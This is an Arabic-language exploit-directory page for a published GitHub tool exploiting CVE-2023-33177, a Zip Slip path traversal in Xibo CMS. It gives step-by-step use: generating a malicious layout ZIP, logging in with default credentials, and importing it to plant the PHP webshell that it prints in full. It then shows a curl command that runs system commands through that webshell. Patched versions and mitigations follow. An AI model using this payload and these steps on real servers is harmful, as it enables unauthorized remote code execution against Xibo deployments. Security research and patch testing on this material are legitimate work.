Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — يُظهر هذا الاستغلال ثغرة **اجتياز المسار** في Xibo CMS (CVE-2023-33177) التي تتيح تنفيذ التعليمات البرمجية عن بُعد عبر استيراد تخطيطات خبيثة. | Kitploit
أدوات/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

يُظهر هذا الاستغلال ثغرة **اجتياز المسار** في Xibo CMS (CVE-2023-33177) التي تتيح تنفيذ التعليمات البرمجية عن بُعد عبر استيراد تخطيطات خبيثة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد
مشاركة

Xibo CMS Zip Slip RCE Exploit CVE-2023-33177

يُظهر هذا الاستغلال ثغرة path traversal في Xibo CMS (CVE-2023-33177) تسمح بتنفيذ الأكواد عن بُعد من خلال استيراد تخطيطات خبيثة.

تفاصيل الثغرة

CVE/Advisory: CVE-2023-33177 الإصدارات المتأثرة:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

نوع الثغرة: Path Traversal (Zip Slip) الأثر: Remote Code Execution (RCE)

الملخص الفني

يسمح Xibo CMS للمستخدمين المصادق عليهم باستيراد ملفات التخطيط عبر أرشيفات ZIP. تفشل وظيفة الاستيراد في التحقق بشكل صحيح من مسارات الملفات في ملف mapping.json، مما يسمح للمهاجم بكتابة ملفات خارج دليل المكتبة المخصص باستخدام تسلسلات path traversal (../../).

كيف يعمل الاستغلال

  1. إنشاء بنية تصدير تخطيط Xibo صالحة مع ملفات JSON المطلوبة
  2. حقن path traversal في mapping.json: استخدام ../../web/shell.php كمسار للملف
  • وضع webshell في المسار المجتاز داخل بنية ZIP على library/../../web/shell.php
  • يفك Xibo الضغط دون تحقق: يُحل إلى /var/www/cms/web/shell.php
  • تحقيق RCE: يمكن الوصول إلى webshell في جذر الويب
  • سلسلة الثغرة

    root@kitploit:~
    Zip contains: library/../../web/shell.php
    Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
    Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
    Result:       /var/www/cms/web/shell.php ← Webshell in web root!
    

    الاستخدام

    توليد الاستغلال

    root@kitploit:~
    python3 create_exploit.py
    

    يُنشئ هذا ملف exploit.zip يحتوي على حزمة التخطيط الخبيثة.

    خطوات الاستغلال

    1. الوصول إلى Xibo CMS وتسجيل الدخول بالبيانات (الافتراضي: xibo_admin / password)
    2. الانتقال إلى الاستيراد: Design → Layouts → Import
    3. رفع exploit.zip
    4. تجاهل أي أخطاء JSON - تمت كتابة الـ webshell بالفعل على القرص
    5. تنفيذ الأوامر عبر الـ webshell:
      root@kitploit:~
      curl 'http://localhost:8080/shell.php?cmd=id'
      

    بنية الملفات

    يحتوي ZIP الاستغلال على:

    root@kitploit:~
    exploit.zip
    ├── layout.json          # Valid Xibo layout definition
    ├── playlist.json        # Empty playlist (triggers JSON import)
    ├── mapping.json         # Contains path traversal payload
    └── library/
        └── ../../web/
            └── shell.php    # PHP webshell (gets extracted to web root)
    

    وظائف الـ Webshell

    الـ webshell المضمّن بسيط:

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    

    الوصول إليه عبر: http://<target>/shell.php?cmd=<command>

    التخفيف

    الإصدارات المصححة:

    • الترقية إلى Xibo CMS 2.3.17+ (لفرع 2.x)
    • الترقية إلى Xibo CMS 3.3.5+ (لفرع 3.x)

    استراتيجيات التخفيف:

    1. التحقق من جميع مسارات الملفات في أرشيفات ZIP قبل فك الضغط
    2. رفض المسارات التي تحتوي على .. أو المسارات المطلقة
    3. استخدام طرق استخراج آمنة تمنع directory traversal
    4. تنفيذ تحقق صحيح من المدخلات في وظيفة الاستيراد
    5. تقييد صلاحيات رفع الملفات إلى المستخدمين المصادق عليهم والمصرح لهم فقط

    إشعار قانوني وأخلاقي

    يُقدَّم هذا الاستغلال للأغراض التالية:

    • الأغراض التعليمية
    • مسابقات CTF
    • اختبار الأمان المصرح به
    • أبحاث الأمان الدفاعية

    لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

    المراجع

    • Advisory: GHSA-jj27-x85q-crqv
    • Xibo CMS: https://xibo.org.uk/
    • Zip Slip Vulnerability: https://security.snyk.io/research/zip-slip-vulnerability
    • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

    المؤلف

    complexusprada نوفمبر 2025

    تنزيل الأداة